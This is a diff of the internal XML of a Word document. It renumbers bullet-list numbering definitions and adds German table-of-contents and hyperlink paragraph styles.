+    <w:lvl w:ilvl="8" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5">
     <w:nsid w:val="335F6FA2"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="D21065DE"/>
@@ -7096,10 +14610,10 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3">
-    <w:nsid w:val="51B3758A"/>
+  <w:abstractNum w:abstractNumId="6">
+    <w:nsid w:val="4C4B2BCF"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="2512A3B2"/>
+    <w:tmpl w:val="C902D01C"/>
     <w:lvl w:ilvl="0" w:tplc="04070001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -7209,10 +14723,10 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4">
-    <w:nsid w:val="54D36AF2"/>
+  <w:abstractNum w:abstractNumId="7">
+    <w:nsid w:val="51B3758A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="402AFE5E"/>
+    <w:tmpl w:val="2512A3B2"/>
     <w:lvl w:ilvl="0" w:tplc="04070001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -7322,10 +14836,10 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5">
-    <w:nsid w:val="646A0DD3"/>
+  <w:abstractNum w:abstractNumId="8">
+    <w:nsid w:val="54D36AF2"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="9496EAAE"/>
+    <w:tmpl w:val="402AFE5E"/>
     <w:lvl w:ilvl="0" w:tplc="04070001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -7435,10 +14949,10 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6">
-    <w:nsid w:val="7456576A"/>
+  <w:abstractNum w:abstractNumId="9">
+    <w:nsid w:val="640B39F2"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="77AEE18C"/>
+    <w:tmpl w:val="721E541A"/>
     <w:lvl w:ilvl="0" w:tplc="04070001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -7548,26 +15062,267 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="10">
+    <w:nsid w:val="646A0DD3"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="9496EAAE"/>
+    <w:lvl w:ilvl="0" w:tplc="04070001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04070001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04070001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="11">
+    <w:nsid w:val="7456576A"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="77AEE18C"/>
+    <w:lvl w:ilvl="0" w:tplc="04070001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04070001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04070001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="2">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="3">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="4">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="5">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="6">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="7">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="8">
     <w:abstractNumId w:val="4"/>
   </w:num>
-  <w:num w:numId="2">
-    <w:abstractNumId w:val="3"/>
+  <w:num w:numId="9">
+    <w:abstractNumId w:val="9"/>
   </w:num>
-  <w:num w:numId="3">
-    <w:abstractNumId w:val="6"/>
-  </w:num>
-  <w:num w:numId="4">
-    <w:abstractNumId w:val="2"/>
-  </w:num>
-  <w:num w:numId="5">
+  <w:num w:numId="10">
     <w:abstractNumId w:val="0"/>
   </w:num>
-  <w:num w:numId="6">
-    <w:abstractNumId w:val="5"/>
+  <w:num w:numId="11">
+    <w:abstractNumId w:val="1"/>
   </w:num>
-  <w:num w:numId="7">
-    <w:abstractNumId w:val="1"/>
+  <w:num w:numId="12">
+    <w:abstractNumId w:val="6"/>
   </w:num>
 </w:numbering>
 </file>
@@ -8062,6 +15817,71 @@
       <w:color w:val="4F81BD" w:themeColor="accent1"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Inhaltsverzeichnisberschrift">
+    <w:name w:val="TOC Heading"/>
+    <w:basedOn w:val="berschrift1"/>
+    <w:next w:val="Standard"/>
+    <w:uiPriority w:val="39"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00513834"/>
+    <w:pPr>
+      <w:outlineLvl w:val="9"/>
+    </w:pPr>
+    <w:rPr>
+      <w:lang w:eastAsia="de-DE"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Verzeichnis1">
+    <w:name w:val="toc 1"/>
+    <w:basedOn w:val="Standard"/>
+    <w:next w:val="Standard"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00513834"/>
+    <w:pPr>
+      <w:spacing w:after="100"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Verzeichnis2">
+    <w:name w:val="toc 2"/>
+    <w:basedOn w:val="Standard"/>
+    <w:next w:val="Standard"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00513834"/>
+    <w:pPr>
+      <w:spacing w:after="100"/>
+      <w:ind w:left="220"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Verzeichnis3">
+    <w:name w:val="toc 3"/>
+    <w:basedOn w:val="Standard"/>
+    <w:next w:val="Standard"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00513834"/>
+    <w:pPr>
+      <w:spacing w:after="100"/>
+      <w:ind w:left="440"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Hyperlink">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="Absatz-Standardschriftart"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00513834"/>
+    <w:rPr>
+      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -8555,6 +16375,71 @@
       <w:color w:val="4F81BD" w:themeColor="accent1"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Inhaltsverzeichnisberschrift">
+    <w:name w:val="TOC Heading"/>
+    <w:basedOn w:val="berschrift1"/>
+    <w:next w:val="Standard"/>
+    <w:uiPriority w:val="39"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00513834"/>
+    <w:pPr>
+      <w:outlineLvl w:val="9"/>
+    </w:pPr>
+    <w:rPr>
+      <w:lang w:eastAsia="de-DE"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Verzeichnis1">
+    <w:name w:val="toc 1"/>
+    <w:basedOn w:val="Standard"/>
+    <w:next w:val="Standard"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00513834"/>
+    <w:pPr>
+      <w:spacing w:after="100"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Verzeichnis2">
+    <w:name w:val="toc 2"/>
+    <w:basedOn w:val="Standard"/>
+    <w:next w:val="Standard"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00513834"/>
+    <w:pPr>
+      <w:spacing w:after="100"/>
+      <w:ind w:left="220"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Verzeichnis3">
+    <w:name w:val="toc 3"/>
+    <w:basedOn w:val="Standard"/>
+    <w:next w:val="Standard"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00513834"/>
+    <w:pPr>
+      <w:spacing w:after="100"/>
+      <w:ind w:left="440"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Hyperlink">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="Absatz-Standardschriftart"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00513834"/>
+    <w:rPr>
+      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -8848,7 +16733,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0257F427-D058-4861-B702-E149AE6585C1}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{87917478-536C-4123-9906-B0B580D56294}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
